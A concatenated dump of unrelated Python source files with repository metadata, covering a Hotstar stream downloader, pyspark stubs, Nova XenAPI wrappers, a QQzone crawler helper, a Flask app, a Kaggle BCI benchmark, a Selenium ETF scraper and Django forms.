            "desired-config": "audio_channel:stereo|dynamic_range:sdr|encryption:plain|ladder:tv|package:dash|resolution:hd|subs-tag:HotstarVIP|video_codec:vp9",
            "device-id": str(uuid.uuid4()),
            "os-name": "Windows",
            "os-version": "10",
        },
    )
    data = response.json()
    # Any other message means the playback URLs were not returned.
    if data["message"] != "Playback URL's fetched successfully":
        print("DRM Protected..! || Premium pack Required")
        return
    return data
def main():
    """CLI entry point: prompt for a Hotstar URL and download it via ffmpeg."""
    ascii_art = pyfiglet.figlet_format("Hotstar dl")
    print(ascii_art)
    url = str(input("Enter the Hotstar URL: "))
    # Hotstar content URLs end in a 10-digit numeric content id.
    url_regex = r'https?://(?:www\.)?hotstar\.com/(?:.+[/-])?(?P<id>\d{10})'
    valid_url = re.match(url_regex, url)
    if not valid_url:
        # Previously an invalid URL was silently ignored.
        print("Invalid Hotstar URL")
        return
    video_data = video_extractor(url)
    if video_data is None:
        # video_extractor already reported the failure (e.g. DRM content);
        # without this guard the subscript below raised TypeError.
        return
    playBackSets = video_data["data"]["playBackSets"]
    hls_url = None
    for playBackSet in playBackSets:
        if playBackSet["tagsCombination"] == "encryption:plain;package:hls":
            hls_url = playBackSet["playbackUrl"]
    if hls_url is None:
        # Without this guard, hls_url could be unbound (NameError).
        print("No plain HLS stream available for this title")
        return
    ffmpeg_download(hls_url, url)


if __name__ == '__main__':
    main()
| [
"prajwalan364@gmail.com"
] | prajwalan364@gmail.com |
e4218be06a9223b9313b577ae2ccd2082b6b7271 | 1092fbf62419d7bf9326efebe0aace3f855cf177 | /python/pyspark/pandas/missing/frame.py | d822c1419247ace140836d9e1f0de5390d87a7bc | [
"Apache-2.0",
"CC0-1.0",
"GCC-exception-3.1",
"BSD-3-Clause",
"LicenseRef-scancode-generic-cla",
"CC-BY-SA-3.0",
"LicenseRef-scancode-free-unknown",
"LGPL-2.0-or-later",
"CPL-1.0",
"NAIST-2003",
"LicenseRef-scancode-unicode",
"CC-PDDC",
"LicenseRef-scancode-other-copyleft",
"EPL-1.0",
"LicenseRef-scancode-unknown-license-reference",
"Classpath-exception-2.0",
"LGPL-2.1-only",
"LicenseRef-scancode-other-permissive",
"CDDL-1.0",
"MIT",
"GPL-2.0-only",
"LicenseRef-scancode-public-domain",
"Python-2.0",
"CDDL-1.1",
"EPL-2.0",
"BSD-2-Clause"
] | permissive | bettermouse/spark | 6cd00c76b42699aca5b0450a081ea4c5a718ba40 | cf19cf5c83f22fb3d6249e1168bd90aad400fde1 | refs/heads/master | 2021-12-14T03:20:49.654960 | 2021-12-08T11:28:30 | 2021-12-08T11:28:30 | 234,536,105 | 0 | 0 | Apache-2.0 | 2020-01-17T11:36:32 | 2020-01-17T11:36:31 | null | UTF-8 | Python | false | false | 3,102 | py | #
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from pyspark.pandas.missing import unsupported_function, unsupported_property, common
def _unsupported_function(method_name, deprecated=False, reason=""):
    """Return a stub for an unsupported ``pd.DataFrame`` method."""
    return unsupported_function(
        class_name="pd.DataFrame", method_name=method_name, deprecated=deprecated, reason=reason
    )
def _unsupported_property(property_name, deprecated=False, reason=""):
    """Return a stub for an unsupported ``pd.DataFrame`` property."""
    return unsupported_property(
        class_name="pd.DataFrame", property_name=property_name, deprecated=deprecated, reason=reason
    )
class _MissingPandasLikeDataFrame(object):
    """Placeholders for pandas.DataFrame APIs not implemented here.

    Each attribute is a stub built by ``_unsupported_function`` /
    ``_unsupported_property`` above; the groups below distinguish plain
    unsupported names, deprecated pandas names, and names that will never
    be supported.
    """
    # Functions
    asfreq = _unsupported_function("asfreq")
    asof = _unsupported_function("asof")
    boxplot = _unsupported_function("boxplot")
    combine = _unsupported_function("combine")
    compare = _unsupported_function("compare")
    convert_dtypes = _unsupported_function("convert_dtypes")
    corrwith = _unsupported_function("corrwith")
    ewm = _unsupported_function("ewm")
    infer_objects = _unsupported_function("infer_objects")
    interpolate = _unsupported_function("interpolate")
    mode = _unsupported_function("mode")
    reorder_levels = _unsupported_function("reorder_levels")
    resample = _unsupported_function("resample")
    set_axis = _unsupported_function("set_axis")
    to_feather = _unsupported_function("to_feather")
    to_gbq = _unsupported_function("to_gbq")
    to_hdf = _unsupported_function("to_hdf")
    to_period = _unsupported_function("to_period")
    to_sql = _unsupported_function("to_sql")
    to_stata = _unsupported_function("to_stata")
    to_timestamp = _unsupported_function("to_timestamp")
    tz_convert = _unsupported_function("tz_convert")
    tz_localize = _unsupported_function("tz_localize")
    # Deprecated functions
    tshift = _unsupported_function("tshift", deprecated=True, reason="Please use shift instead.")
    slice_shift = _unsupported_function(
        "slice_shift", deprecated=True, reason="You can use DataFrame/Series.shift instead."
    )
    lookup = _unsupported_function(
        "lookup", deprecated=True, reason="Use DataFrame.melt and DataFrame.loc instead."
    )
    # Functions we won't support.
    to_pickle = common.to_pickle(_unsupported_function)
    memory_usage = common.memory_usage(_unsupported_function)
    to_xarray = common.to_xarray(_unsupported_function)
| [
"gurwls223@apache.org"
] | gurwls223@apache.org |
69c92ee8ed5eb078b614684a346b089f78b4a750 | eec8ce578fb66dbddc44bbaf6844044be8833397 | /venv/bin/easy_install-3.6 | a6825d0cabe19cbd90459818aafb27dd7c96d8bb | [] | no_license | tuanweb92my/store_rest_api_test | 0f5b43675b05b538ffac99e4ada4d54a9a9930a2 | 47c862dfd35a4f532a890a1f2a050b2ad6cb2831 | refs/heads/master | 2020-04-24T02:27:16.473994 | 2019-02-20T09:55:46 | 2019-02-20T09:55:46 | 171,637,064 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 290 | 6 | #!/Users/nguyeant/Downloads/testing-python-apps/section8/venv/bin/python3.6
# -*- coding: utf-8 -*-
import re
import sys
from setuptools.command.easy_install import main
# Strip the "-script.py(w)"/".exe" wrapper suffix from argv[0] so setuptools
# reports the bare command name, then run easy_install's main().
if __name__ == '__main__':
    sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
    sys.exit(main())
| [
"nguyenanhtuan92my@gmail.com"
] | nguyenanhtuan92my@gmail.com |
8eae7291444ef47cce77a8103e2172bc6bd9bad6 | 53faa0ef3496997412eb5e697bc85eb09a28f8c9 | /math/0x01-plotting/1-scatter.py | a31bb2257ce08f336c4b29620aefcb8612f794db | [] | no_license | oran2527/holbertonschool-machine_learning | aaec2ffe762b959573f98a5f4e002272a5d643a3 | 8761eb876046ad3c0c3f85d98dbdca4007d93cd1 | refs/heads/master | 2023-08-14T00:37:31.163130 | 2021-09-20T13:34:33 | 2021-09-20T13:34:33 | 330,999,053 | 0 | 2 | null | null | null | null | UTF-8 | Python | false | false | 332 | py | #!/usr/bin/env python3
import numpy as np
import matplotlib.pyplot as plt
# Draw 2000 correlated (height, weight) samples from a bivariate normal;
# heights are centred on 69 in, weights shifted to ~180 lbs below.
mean = [69, 0]
cov = [[15, 8], [8, 15]]
np.random.seed(5)
x, y = np.random.multivariate_normal(mean, cov, 2000).T
y += 180
plt.xlabel('Height (in)')
plt.ylabel('Weight (lbs)')
plt.title('Men\'s Height vs Weight')
# NOTE(review): 'ro' requests red markers but color="m" overrides to magenta.
plt.plot(x, y, 'ro', color="m")
plt.show()
| [
"orlago250183@gmail.com"
] | orlago250183@gmail.com |
284e0490864499f54aad2f20350204ec7c8c027c | b5550fc728b23cb5890fd58ccc5e1668548dc4e3 | /virt/xenapi/client/objects.py | e802cad3a40334862761921e10431b1be1d92fa6 | [] | no_license | bopopescu/nova-24 | 0de13f078cf7a2b845cf01e613aaca2d3ae6104c | 3247a7199932abf9718fb3260db23e9e40013731 | refs/heads/master | 2022-11-20T00:48:53.224075 | 2016-12-22T09:09:57 | 2016-12-22T09:09:57 | 282,140,423 | 0 | 0 | null | 2020-07-24T06:24:14 | 2020-07-24T06:24:13 | null | UTF-8 | Python | false | false | 4,602 | py | #coding:utf-8
# Copyright 2013 OpenStack Foundation
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from nova import utils
class XenAPISessionObject(object):
    """Thin proxy for one class of the XenAPI database (VM, SR, VDI, ...).

    XenAPI is an XML-RPC interface whose messages are named
    "<Class>.<method>" (for example "VM.get_record" or "SR.scan").
    An instance remembers the XenAPI class name and forwards any attribute
    access as the corresponding remote call, keeping call sites short and
    easy to mock:

        vm_ref = session.VM.get_by_uuid(uuid)
        session.VM.destroy(vm_ref)
        vbd_refs = session.VM.get_VBDs(vm_ref)

    Fetching a single field (e.g. "get_VBDs") is much cheaper than pulling
    the whole record with "get_record".  When searching for objects,
    "get_all_records_where" is usually preferable to "get_all", which is
    prone to races as objects get deleted underneath you.
    """

    def __init__(self, session, name):
        self.session = session
        self.name = name

    def _call_method(self, method_name, *args):
        # XenAPI message names are "<class>.<method>", e.g. "VM.start".
        qualified = self.name + "." + method_name
        return self.session.call_xenapi(qualified, *args)

    def __getattr__(self, method_name):
        # Any unknown attribute becomes a remote call on this XenAPI class.
        def _proxy(*params):
            return self._call_method(method_name, *params)
        return _proxy
class VM(XenAPISessionObject):
    """Virtual Machine (XenAPI "VM" class)."""
    def __init__(self, session):
        super(VM, self).__init__(session, "VM")
class VBD(XenAPISessionObject):
    """Virtual block device (XenAPI "VBD" class)."""
    def __init__(self, session):
        super(VBD, self).__init__(session, "VBD")
    def plug(self, vbd_ref, vm_ref):
        """Plug *vbd_ref* into its VM, serialized per-VM via a lock."""
        @utils.synchronized('xenapi-vbd-' + vm_ref)
        def synchronized_plug():
            self._call_method("plug", vbd_ref)
        # NOTE(johngarbutt) we need to ensure there is only ever one
        # VBD.unplug or VBD.plug happening at once per VM
        # due to a bug in XenServer 6.1 and 6.2
        synchronized_plug()
    def unplug(self, vbd_ref, vm_ref):
        """Unplug *vbd_ref* from its VM, serialized per-VM via a lock."""
        @utils.synchronized('xenapi-vbd-' + vm_ref)
        def synchronized_unplug():
            self._call_method("unplug", vbd_ref)
        # NOTE(johngarbutt) we need to ensure there is only ever one
        # VBD.unplug or VBD.plug happening at once per VM
        # due to a bug in XenServer 6.1 and 6.2
        synchronized_unplug()
# Thin per-class wrappers: each just binds the XenAPI class name so callers
# can write e.g. session.VDI.get_record(...) or session.pool.join(...).
class VDI(XenAPISessionObject):
    """Virtual disk image (XenAPI "VDI" class)."""
    def __init__(self, session):
        super(VDI, self).__init__(session, "VDI")
class SR(XenAPISessionObject):
    """Storage Repository (XenAPI "SR" class)."""
    def __init__(self, session):
        super(SR, self).__init__(session, "SR")
class PBD(XenAPISessionObject):
    """Physical block device (XenAPI "PBD" class)."""
    def __init__(self, session):
        super(PBD, self).__init__(session, "PBD")
class PIF(XenAPISessionObject):
    """Physical Network Interface (XenAPI "PIF" class)."""
    def __init__(self, session):
        super(PIF, self).__init__(session, "PIF")
class VLAN(XenAPISessionObject):
    """VLAN (XenAPI "VLAN" class)."""
    def __init__(self, session):
        super(VLAN, self).__init__(session, "VLAN")
class Host(XenAPISessionObject):
    """XenServer hosts (XenAPI "host" class)."""
    def __init__(self, session):
        super(Host, self).__init__(session, "host")
class Network(XenAPISessionObject):
    """Networks that VIFs are attached to (XenAPI "network" class)."""
    def __init__(self, session):
        super(Network, self).__init__(session, "network")
class Pool(XenAPISessionObject):
    """Pool of hosts (XenAPI "pool" class)."""
    def __init__(self, session):
        super(Pool, self).__init__(session, "pool")
| [
"719184289@qq.com"
] | 719184289@qq.com |
f61c551575b980d89d409934c89b3df93ae03fdc | 2fd9e55cf1d8c13bd475122482e13954d2a001e7 | /Web_Scraping_example.py | af6ed033cb2d3fc253ef772c722c295e3ad56ff9 | [] | no_license | amarosfg/A-Useful-Tool-to-Collect-Data-Web-Scraping | 2a2c68e96da4a4bb91b708c4e8b74d36c438a533 | 5f93730037cee973e6e2dc7704c94b196bdc2ddc | refs/heads/main | 2022-12-31T20:37:11.501444 | 2020-10-25T22:36:47 | 2020-10-25T22:36:47 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,584 | py | from selenium import webdriver
from selenium.webdriver.common.desired_capabilities import DesiredCapabilities
import pandas
import numpy
from openpyxl import Workbook
#The variable wb creates an excel workbook
wb = Workbook()
#Activate the active worksheet
ws = wb.active
#The variables options and preferences that the programmer wants enable or disable
caps = DesiredCapabilities().CHROME
caps["pageLoadStrategy"] = "normal"
chrome_options = webdriver.ChromeOptions()
chrome_options.add_argument(" - disable-infobars")
#The directory MUST be changed if the code is used in another computer
prefs={"download.default_directory" : "C:/Users/xxxxxx/Documents/Python Scripts/Driver/"}
chrome_options.add_experimental_option("prefs",prefs)
#The variables path and archive_excel have the routes to the WebDriver and the csv file with the list of ETFs
#Same as in line 15
path="C:/Users/xxxxxx/Documents/Python Scripts/Driver/chromedriver.exe"
archivo_excel='C:/Users/xxxxxx/Documents/Python Scripts/Web_Scrapping/Excel/Prueba.csv'
#df reads the file and assign into two variables, the size of the data that archivo_excel has
df=pandas.read_csv(archivo_excel, sep=',')
ren=df.shape[0]
col=df.shape[1]
#The variable nombres is a vector that has the names of all the ETFs the code is going to do web scraping
nombres=list(df.iloc[:,0])
#The variable drive has the path and all the preferences described in line 10
driver=webdriver.Chrome(path,chrome_options=chrome_options,desired_capabilities=caps)
x=ren
l=[]
y=[]
#The variable y has all the features that the code is going to extract from the web page
y=['ETF','Segmento','Score 1','Score 2','Net Asset Value (Yesterday)','Expense Ratio','Assets Under Management','Average Daily $ Volume', 'Holding_1', 'Holding_2', 'Holding_3', 'Holding_4', 'Holding_5', 'Holding_6', 'Holding_7', 'Holding_8', 'Holding_9', 'Holding_10']
#The variable y is inserted in the first row of the workbook that was created
ws.append(y)
#The code will repeat the next lines for each ETF stored in the variable nombres
for x in range(0,len(nombres)):
    y=[]
    #The variable etf will be the name of the ETF
    etf=nombres[x]
    #The WebDriver will open the requested web page with the specific ETF
    driver.get("http://www.etf.com/"+etf)
    #The WebDriver will search the text that the programmer wants to extract by searching the XPath
    segmento_html=driver.find_element_by_xpath('//*[@id="form-reports-header"]/div[1]/section[3]/div[1]/div[1]/div/a')
    #The variable segmento will store the text that the WebDriver found from the XPath
    segmento=segmento_html.text
    #The functions try and except are used in case the information the programmer wanted is not found
    try:
        score_1_html=driver.find_element_by_xpath('//*[@id="score"]/span/div[1]')
        score_1=score_1_html.text
        score_2_html =driver.find_element_by_xpath('//*[@id="score"]/span/div[2]')
        score_2=score_2_html.text
    except:
        score_1="NA"
        score_2="NA"
    try:
        NAV_html=driver.find_element_by_xpath('//*[@id="fundTradabilityData"]/div/div[16]/span')
        NAV=NAV_html.text
    except:
        NAV="NA"
    #The variable y will store all the features that were founded by the WebDriver
    y.extend([etf,segmento,score_1,score_2,NAV])
    #The features stored in summary_table had different structure inside the webpage for some ETFs. The rest of the
    #Structure remains as in line 43 of the code
    summary_table=[]
    for p in range(4,7):
        #pdb.set_trace()
        try:
            # NOTE(review): the next two lines appear to be one long "if"
            # whose line continuation was lost (ends in "or"); as written
            # this is a syntax error — confirm against the original file.
            if etf=="QQQ" or etf=="GDX" or etf=="VWO" or etf=="GDXJ" or etf=="VEA" or etf=="RSX" or etf=="OIH" or
            etf=="SMH" or etf=="VNQ" or etf=="VGK" or etf=="VOO":
                summary_data_html =driver.find_element_by_xpath('//*[@id="fundSummaryData"]/div/div['+str(p)+']/span')
                summary_data=summary_data_html.text
                summary_table.extend([summary_data])
                y.extend([summary_data])
            elif etf=="TQQQ" or etf=="JNUG" or etf=="NUGT" or etf=="UPRO" or etf=="SPXL" or etf=="TNA" or etf=="ERX":
                summary_data_html =driver.find_element_by_xpath(' //*[@id="fundSummaryData"]/div/div['+str(p-1)+']/span')
                summary_data=summary_data_html.text
                summary_table.extend([summary_data])
                y.extend([summary_data])
            else:
                summary_data_html =driver.find_element_by_xpath('//*[@id="fundSummaryData"]/div/div['+str(p+1)+']/span')
                summary_data=summary_data_html.text
                summary_table.extend([summary_data])
                y.extend([summary_data])
        except:
            summary_data="NA"
            summary_table.extend([summary_data])
            y.extend([summary_data])
    #Same happens to variable holdings_table as in lines 64 and 65
    holdings_table=[]
    for p in range(1,11):
        #pdb.set_trace(), is used to track possible errors in the for loop
        try:
            holdings_html =driver.find_element_by_xpath('//*[@id="fit"]/div[1]/div[2]/div/div['+str(p)+']')
            holdings_data=holdings_html.text
            holdings_table.extend([holdings_data])
            y.extend([holdings_data])
        except:
            holdings_data="NA"
            holdings_table.extend([holdings_data])
            y.extend([holdings_data])
    ws.append(y)
#Save the workbook in that route and with the name resultadoetf.csv. Same as in line 15
wb.save('C:/Users/xxxxxx/Documents/Python Scripts/Web_Scrapping/Excel/resultadoetf.csv')
#The WebDriver is closed
driver.quit()
| [
"noreply@github.com"
] | amarosfg.noreply@github.com |
2412eddc47f2013111e511fe282a4454d0b51120 | c45de1dc96e83028bf150f517d0fa6d7b12a166d | /notebooks/_context.py | 9da323ad3bf37498edcf5944dd0d4bbce76da054 | [] | no_license | EmilioTyl/transformers_from_scratch | 36dc58b30d94d873cb7d496545291bb4ca9697de | 3bb025281eeb877ef1a5844fa81df04c57aa13a1 | refs/heads/master | 2022-12-11T04:54:00.792888 | 2020-08-27T09:14:08 | 2020-08-27T09:14:08 | 286,479,715 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 203 | py | import os
import sys
# Make the project root and src/ importable when running notebooks directly.
sys.path.insert(0, os.path.abspath(os.path.join(os.path.dirname(__file__), '..')))
sys.path.insert(0, os.path.abspath(os.path.join(os.path.dirname(__file__), '../src')))
import src
"emilio.tylson@satellogic.com"
] | emilio.tylson@satellogic.com |
96c4752b789ae956d8b79a60a674b50ba638d7b1 | 9fdc676a6cabd9d47eb470659047b406a1305d02 | /flask_hougou.py | 6db82d600df199c54243326ce341288eb4a9fb0f | [
"MIT"
] | permissive | ColdFc/test | c3cb296095cca718db93b1ff6f918bc8b40067f7 | a0be1d71cee99351763205efb6224142ec208687 | refs/heads/master | 2020-05-26T20:48:35.014900 | 2019-05-24T12:54:52 | 2019-05-24T12:54:52 | 188,369,125 | 9 | 0 | null | null | null | null | UTF-8 | Python | false | false | 720 | py | from flask import Flask
from flask import request
# Serve static files from static/ at the site root (no /static prefix).
app = Flask(__name__, static_url_path="", static_folder="static")
class Config(object):
    # Debug mode: auto-reload and interactive tracebacks; disable in production.
    DEBUG = True
app.config.from_object(Config)
def _read_template(name):
    """Return the raw bytes of templates/<name>; shared by all page routes."""
    with open("templates/" + name, "rb") as f:
        return f.read()


@app.route("/", methods=["GET"])
def index():
    """Serve the home page."""
    return _read_template("home.html")


@app.route("/login.html", methods=["GET", "POST"])
def login():
    """Serve the login page."""
    return _read_template("login.html")


@app.route("/register.html", methods=["POST", "GET"])
def register():
    """Serve the registration page."""
    return _read_template("register.html")
if __name__ == '__main__':
    # Development server only; use a proper WSGI server in production.
    app.run(debug=True)
| [
"666666@qq.com"
] | 666666@qq.com |
55e61a82cbbef2c7f69744f6e61aabfee698e0d1 | e1e87a1addef379797a131d2458b01fb98ed7ff5 | /bci/samples/python/gbm_benchmark_v2.py | 140c2233d61c1867ddf9103453ebaedb4244eee6 | [] | no_license | thekannman/kaggle | d564a52a4da163da52d8f4348f0438db0fda7fc1 | a8e0bf60ce643385b1e880fffb8db850c2cf32c8 | refs/heads/master | 2021-01-10T02:31:15.054100 | 2015-10-28T03:14:39 | 2015-10-28T03:14:39 | 45,085,807 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,728 | py | ## author: phalaris
## kaggle bci challenge gbm benchmark
from __future__ import division
import numpy as np
import pandas as pd
import sklearn.ensemble as ens
train_subs = ['02','06','07','11','12','13','14','16','17','18','20','21','22','23','24','26']
test_subs = ['01','03','04','05','08','09','10','15','19','25']
train_labels = pd.read_csv('TrainLabels.csv')
submission = pd.read_csv('SampleSubmission.csv')
train = pd.DataFrame(columns=['subject','session','feedback_num','start_pos'] + ['Cz_' + s for s in map(str,range(261))],index=range(5440))
counter = 0
print 'loading train data'
data = {}
for i in train_subs:
for j in range(1,6):
temp = pd.read_csv('train/Data_S' + i + '_Sess0' + str(j) + '.csv')
fb = temp.query('FeedBackEvent == 1',engine='python')['FeedBackEvent']
counter2 = 0
for k in fb.index:
temp2 = temp.loc[int(k):int(k)+260,'Cz']
temp2.index = ['Cz_' + s for s in map(str,range(261))]
train.loc[counter,['Cz_' + s for s in map(str,range(261))]] = temp2
train.loc[counter,'session'] = j
train.loc[counter, 'subject'] = i
train.loc[counter, 'feedback_num'] = counter2
train.loc[counter, 'start_pos'] = k
counter +=1
counter2 +=1
print 'subject ', i
train.to_csv('train_cz.csv',ignore_index=True)
test = pd.DataFrame(columns=['subject','session','feedback_num','start_pos'] + ['Cz_' + s for s in map(str,range(261))],index=range(3400))
print 'loading test data'
counter = 0
data = {}
for i in test_subs:
for j in range(1,6):
temp = pd.read_csv('test/Data_S' + i + '_Sess0' + str(j) + '.csv')
fb = temp.query('FeedBackEvent == 1',engine='python')['FeedBackEvent']
counter2 = 0
for k in fb.index:
temp2 = temp.loc[int(k):int(k)+260,'Cz']
temp2.index = ['Cz_' + s for s in map(str,range(261))]
test.loc[counter,['Cz_' + s for s in map(str,range(261))]] = temp2
test.loc[counter,'session'] = j
test.loc[counter, 'subject'] = i
test.loc[counter, 'feedback_num'] = counter2
test.loc[counter, 'start_pos'] = k
counter +=1
counter2 +=1
print 'subject ', i
test.to_csv('test_cz.csv',ignore_index=True)
print 'training GBM'
gbm = ens.GradientBoostingClassifier(n_estimators=500,learning_rate=0.05, max_features=0.25)
gbm.fit(train, train_labels.values[:,1].ravel())
preds = gbm.predict_proba(test)
preds = preds[:,1]
submission['Prediction'] = preds
submission.to_csv('gbm_benchmark.csv',index=False)
print 'Done'
| [
"zkann@wisc.edu"
] | zkann@wisc.edu |
cc58f72ba71f39f13c3376a8c2f163006cbb6680 | 645144dddae7921d562300656feaf330223bd2d9 | /QQzone_crawler/util.py | 43c61a161e504ea5fb62bd70b39b3537e5dc1d97 | [] | no_license | zhuliquan/crawler_learning | 79c4b13aea8e5f62cc7687473f14c778d72d6389 | b0e4944cee4e143c7d2497f6688c2c5b06ad979a | refs/heads/master | 2021-05-10T09:53:19.799091 | 2018-04-27T12:28:19 | 2018-04-27T12:28:19 | 118,942,678 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,838 | py | #!/usr/bin/env python3
#-*- coding:utf-8 -*-
from urllib import parse
import os
def get_cookie():
    '''Read the QQ login cookie from the local "cookie_file", stripped of newlines.'''
    with open('cookie_file') as f:
        cookie = f.read()
    cookie = cookie.replace('\n', '')
    return cookie
# Module-level cookie string reused by the URL builders below.
cookie = get_cookie()
# Default request headers for Qzone's mobile (h5) endpoints.
headers = {'host': 'h5.qzone.qq.com',
           'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36',
           'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
           'Accept-Language': 'zh,zh-CN;q=0.8,en-US;q=0.5,en;q=0.3',
           'Accept-Encoding': 'gzip, deflate, br',
           'Cookie': cookie,
           'connection': 'keep-alive'}
def get_g_tk():
    '''Compute the g_tk anti-CSRF token from the p_skey value in the cookie.'''
    # Extract p_skey from the module-level cookie string.
    pskey_start = cookie.find('p_skey=')
    pskey_end = cookie.find(';', pskey_start)
    p_skey = cookie[pskey_start+7: pskey_end]
    # djb2-style rolling hash, masked to a positive 31-bit integer.
    h = 5381
    for s in p_skey:
        h += (h << 5) + ord(s)
    return h & 2147483647
# Token reused by the URL builders below.
g_tk = get_g_tk()
def parse_moods_url(qqnum):
    '''Build the mood-list (emotion_cgi_msglist) CGI URL for one friend.

    *qqnum* is the friend's QQ number; the module-level g_tk token is
    included so the request is accepted.
    '''
    params = {"cgi_host": "http://taotao.qq.com/cgi-bin/emotion_cgi_msglist_v6",
              "code_version": 1,
              "format": "jsonp",
              "g_tk": g_tk,
              "hostUin": qqnum,
              "inCharset": "utf-8",
              "need_private_comment": 1,
              "notice": 0,
              "num": 20,
              "outCharset": "utf-8",
              "sort": 0,
              "uin": qqnum}
    host = "https://h5.qzone.qq.com/proxy/domain/taotao.qq.com/cgi-bin/emotion_cgi_msglist_v6?"
    url = host + parse.urlencode(params)
    return url
def parse_friends_url():
    '''Build the friend-list (get_entryuinlist) CGI URL for the cookie owner.

    The owner's QQ number is not passed in; it is pulled from the "uin=o..."
    field of the module-level cookie stored in ``headers``.
    '''
    cookie = headers['Cookie']
    qq_start = cookie.find('uin=o')
    qq_end = cookie.find(';', qq_start)
    qqnumber = cookie[qq_start+5 : qq_end]
    # Bug fix: the cookie uin is zero-padded; the old check compared the
    # first *character* to the integer 0, which is never true, so the
    # leading '0' was never stripped.
    if qqnumber[0] == '0':
        qqnumber = qqnumber[1:]
    params = {"uin": qqnumber,
              "fupdate": 1,
              "action": 1,
              "g_tk": g_tk}
    host = "https://h5.qzone.qq.com/proxy/domain/base.qzone.qq.com/cgi-bin/right/get_entryuinlist.cgi?"
    #https://h5.qzone.qq.com/proxy/domain/base.qzone.qq.com/cgi-bin/right/get_entryuinlist.cgi?uin=284182470&fupdate=1&action=1&offset=200&g_tk=1350570173&qzonetoken=8114052f3d145601114b9b3f8caad4ad2853b418b9c345f42af296d6d3e2c980b592a1b7c52273aaa0
    url = host + parse.urlencode(params)
    return url
def check_path(path):
    '''Ensure *path* exists, creating it as a directory when missing.'''
    if os.path.exists(path):
        return
    os.mkdir(path)
| [
"zlq164114@sina.com"
] | zlq164114@sina.com |
08b2432bf85b349c0854e59b7fdc613edfc2fe22 | 53fab060fa262e5d5026e0807d93c75fb81e67b9 | /backup/user_266/ch10_2019_03_08_10_59_34_133923.py | 5f6fc7c074676543b2b99848c0e35abf7b089d59 | [] | no_license | gabriellaec/desoft-analise-exercicios | b77c6999424c5ce7e44086a12589a0ad43d6adca | 01940ab0897aa6005764fc220b900e4d6161d36b | refs/heads/main | 2023-01-31T17:19:42.050628 | 2020-12-16T05:21:31 | 2020-12-16T05:21:31 | 306,735,108 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 85 | py | def libras_para_kg(lb):
kg = lb/2.204622
return (float('{0:.6f}'.format(kg))) | [
"you@example.com"
] | you@example.com |
3396bba7978380eaf9eadb1be37f112de85b3074 | 3aafebe8dda3732fdc354df3c253a56762d99bf2 | /integral_view/forms/remote_replication_forms.py | f50fc1ab09b3e7b3e4f2d99ee37638a49cebdb3f | [] | no_license | fractalio/integralstor | e666566301f793cb598a08778861b42710e34e19 | 1aa3e8000e7b676afb3fcadf6627991cc84c62e6 | refs/heads/master | 2021-06-24T15:41:09.400882 | 2017-09-13T06:31:55 | 2017-09-13T14:27:10 | 103,245,335 | 1 | 0 | null | 2017-09-12T08:44:05 | 2017-09-12T08:44:05 | null | UTF-8 | Python | false | false | 4,537 | py | from django import forms
class ZFSMode(forms.Form):
    """Form for the ZFS replication mode: collects the target pool name."""
    target_pool = forms.CharField()

    def clean_target_pool(self):
        """Reject pool names containing quotes or starting with a digit."""
        target_pool = self.cleaned_data['target_pool']
        if target_pool and (target_pool.find('\'') >= 0 or target_pool.find('\"') >= 0):
            self._errors["target_pool"] = self.error_class(
                ["Pool name cannot contain single or double quotes."])
        # Bug fix: the old check used target_pool.isdigit(), which only
        # rejected names made up entirely of digits; the stated rule (and
        # error message) is that the name must not *start* with a digit.
        if target_pool and target_pool[0].isdigit():
            self._errors["target_pool"] = self.error_class(
                ["Pool name cannot start with a number."])
        return target_pool
class RsyncMode(forms.Form):
    """Form for the rsync replication mode: paths, direction, and switches."""
    local_path = forms.CharField()
    remote_path = forms.CharField()
    rsync_type = forms.ChoiceField(choices=[('push', 'local host to remote host(push)'), (
        'pull', 'remote host to local host(pull)'), ('local', 'within the local host')])
    is_between_integralstor = forms.BooleanField(
        widget=forms.CheckboxInput(attrs={'checked': 'checked'}), required=False)
    # is_between_integralstor = forms.BooleanField(required=False)
    def __init__(self, *args, **kwargs):
        """Accept optional 'switches' (rsync flag metadata) and 'initial' kwargs."""
        switches = None
        initial = None
        switch_ch = []
        if kwargs:
            if 'switches' in kwargs:
                switches = kwargs.pop('switches')
            if 'initial' in kwargs:
                initial = kwargs.pop('initial')
        super(RsyncMode, self).__init__(*args, **kwargs)
        if switches:
            # Build one checkbox per switch; switches flagged is_arg also
            # get a companion free-text argument field named "<id>_arg".
            for switch, val in switches.items():
                switch_ch.append(
                    ({switch: switches[switch]}, val['description']))
                if val['is_arg'] == True:
                    self.fields['%s_arg' %
                                 val['id']] = forms.CharField(required=False)
            self.fields['switches'] = forms.MultipleChoiceField(
                widget=forms.widgets.CheckboxSelectMultiple,
                choices=switch_ch,
                required=False)
class CreateRemoteReplication(ZFSMode, RsyncMode):
    """Combined form for creating a replication task in either zfs or rsync mode.

    Depending on the 'select_mode' kwarg, the fields inherited from the
    inactive mode are made optional so validation only applies to the
    chosen mode.
    """
    target_ip = forms.GenericIPAddressField(protocol='IPv4')
